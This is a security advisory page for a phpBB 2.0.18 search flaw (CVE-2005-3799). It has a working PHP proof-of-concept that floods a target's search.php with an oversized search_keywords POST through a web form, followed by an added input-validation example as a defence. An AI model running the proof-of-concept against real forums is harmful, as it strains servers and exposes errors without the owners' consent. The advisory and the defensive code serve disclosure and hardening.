phpBB 2.0.18 sql query problem PoC

Published / (Updated): 2005-11-11 / 2005-09-30
Credit: Maksymilian Arciemowicz
Risk: Low
CWE: N/A
CVE: CVE-2005-3799
Local: No
Remote: No

CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

<?php
#
# phpBB 2.0.18 examples errors
# Maksymilian Arciemowicz
# cxib [at] cxsecurity [dot] com
#
# Sends one POST to search.php whose search_keywords field is ILE x 2048 bytes long
# and prints the body of the server's reply.

if (isset($_POST['HOST']) AND isset($_POST['CAT']) AND isset($_POST['ILE'])) {

    # 120 x "SecurityReasonCom" (17 bytes) + "Security" (8 bytes) = 2048 bytes
    $POSTx = str_repeat("SecurityReasonCom", 120) . "Security"; # 2048b

    $POST = "mode=results&search_keywords=";

    $ile = (int) $_POST['ILE'];
    for ($x = 1; $x <= $ile; $x++) {
        $POST .= $POSTx; # f(x)=x * 2048b
    }

    $sock = fsockopen($_POST['HOST'], 80);
    if (!$sock) {
        echo "Cannot connect to " . $_POST['HOST'] . ":80";
        exit;
    }

    # HTTP headers end with CRLF; "Connection: close" makes the server close the
    # socket after the reply, so the feof() loop below terminates instead of
    # waiting for the keep-alive timeout. Content-Length must equal the body
    # exactly, so no extra CRLF is appended after the body.
    $out  = "POST " . $_POST['CAT'] . "search.php HTTP/1.1\r\n";
    $out .= "Host: " . $_POST['HOST'] . "\r\n";
    $out .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $out .= "Content-Length: " . strlen($POST) . "\r\n";
    $out .= "Connection: close\r\n\r\n";
    $out .= $POST;

    fwrite($sock, $out);

    $data = "";
    while (!feof($sock)) {
        $data .= fread($sock, 4096);
    }

    fclose($sock);

    # drop the response headers, keep the body
    $data = substr($data, strpos($data, "\r\n\r\n") + 4);

    echo $data;

} else {

    echo "<CENTER>
<A HREF=\"http://cxsecurity.com\"><IMG SRC=\"http://cxsecurity.com/gfx/small_logo.png\"></A><P>
<FORM action=\"\" method=post enctype=\"multipart/form-data\">
HOST: <input TYPE=\"text\" name=\"HOST\"> Like www.cxsecurity.com<br>
CATALOG: <input TYPE=\"text\" name=\"CAT\"> Like: /phpBB2/<br>
f(x)= <input TYPE=\"text\" name=\"ILE\" value=\"512\"> x 2048b (example 512 x 2048)<br>
<input TYPE=\"submit\" value=\"Send\">
</FORM>";

}
?>
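The PoC above only builds the oversized search_keywords value (512 x 2048 bytes by default) and sends it to search.php. The defensive counterpart, shown below as an added example that is not part of the original advisory and not phpBB's own patch, is a server-side guard that rejects oversized or over-tokenised search input before it reaches the database layer. The limits SEARCH_MAX_BYTES and SEARCH_MAX_TERMS, the function name validate_search_keywords, and the sample inputs are assumptions chosen for illustration.

```php
<?php
// Added example, not phpBB code: refuse oversized search input before any
// query is built from it. Limit values are assumed; tune them for the site.
define('SEARCH_MAX_BYTES', 255);   // assumed: maximum accepted length of search_keywords
define('SEARCH_MAX_TERMS', 10);    // assumed: maximum number of whitespace-separated terms

// Returns the normalised keyword string, or null when the request must be rejected.
function validate_search_keywords($raw)
{
    if (!is_string($raw)) {
        return null;
    }
    // Check the byte length first: strlen() is O(1) and runs before any
    // tokenising, so a megabyte-sized body is dropped without further work.
    if (strlen($raw) > SEARCH_MAX_BYTES) {
        return null;
    }
    $terms = preg_split('/\s+/', trim($raw), -1, PREG_SPLIT_NO_EMPTY);
    if (count($terms) === 0 || count($terms) > SEARCH_MAX_TERMS) {
        return null;
    }
    return implode(' ', $terms);
}

// Constructed inputs for a stand-alone check. The third one reproduces the
// PoC's default payload: 512 repetitions of a 2048-byte block.
$samples = array(
    array('phpbb search',                                   'accepted'),
    array(str_repeat('word ', SEARCH_MAX_TERMS + 1),        'rejected'),
    array(str_repeat(str_repeat('SecurityReasonCom', 120) . 'Security', 512), 'rejected'),
);

foreach ($samples as $pair) {
    list($input, $expected) = $pair;
    $result = (validate_search_keywords($input) === null) ? 'rejected' : 'accepted';
    printf("%-8s expected %-8s got %-8s (%d bytes)\n",
        $result === $expected ? 'OK' : 'FAIL', $expected, $result, strlen($input));
}

// In a real handler (assumed shape, illustration only) the guard sits at the top:
//   $keywords = validate_search_keywords(isset($_POST['search_keywords']) ? $_POST['search_keywords'] : '');
//   if ($keywords === null) { header('HTTP/1.1 400 Bad Request'); exit; }
//   ... only now build and run the search query with $keywords ...
```

The length check is deliberately placed before the tokeniser so that the cost of rejecting a request does not itself grow with the size of the request; a term-count cap after it keeps a short but dense input from expanding into an unbounded number of query clauses.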

References:

http://cxsecurity.com/issue/WLB-2005090050


Copyright 2017, cxsecurity.com